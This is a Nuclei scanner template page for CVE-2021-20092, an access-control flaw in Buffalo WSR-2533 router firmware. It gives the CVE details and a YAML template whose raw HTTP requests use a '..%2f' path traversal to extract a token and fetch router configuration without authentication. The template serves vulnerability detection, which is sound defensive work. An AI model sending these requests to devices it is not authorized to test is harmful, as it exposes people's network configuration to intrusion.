Skip to content
Nuclei Templates

Buffalo WSR-2533DHPL2 - Improper Access Control

ID: CVE-2021-20092

Severity: high

Author: gy741,pdteam,parth

Tags: cve2021,cve,buffalo,firmware,iot,tenable

Description

Section titled “Description”

The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.

YAML Source

Section titled “YAML Source”
id: CVE-2021-20092


info:
  name: Buffalo WSR-2533DHPL2 - Improper Access Control
  author: gy741,pdteam,parth
  severity: high
  description: |
    The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to the router's configuration settings and potentially compromise the entire network.
  remediation: |
    Apply the latest firmware update provided by Buffalo to fix the access control issue.
  reference:
    - https://www.tenable.com/security/research/tra-2021-13
    - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-20092
    cwe-id: CWE-287
    epss-score: 0.01583
    epss-percentile: 0.87312
    cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: buffalo
    product: wsr-2533dhpl2-bk_firmware
  tags: cve2021,cve,buffalo,firmware,iot,tenable


http:
  - raw:
      - |
        GET /images/..%2finfo.html HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/info.html
      - |
        GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: lang=8; url=ping.html; mobile=false;
        Referer: {{BaseURL}}/info.html
        Content-Type: application/x-www-form-urlencoded


    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "application/x-javascript"


      - type: word
        words:
          - "/*DEMO*/"
          - "addCfg("
        condition: and


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        name: httoken
        group: 1
        regex:
          - 'base64\,(.*?)" border='
        internal: true
# digest: 490a0046304402200575502f6e451259c25fea4cdabd8fcbe6881f7301f3377ba968b8d496161e3a0220583327c29f583f25c4b5323da9480385e596845fdb3d54d034c82439522ea21f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-20092.yaml"

View on Github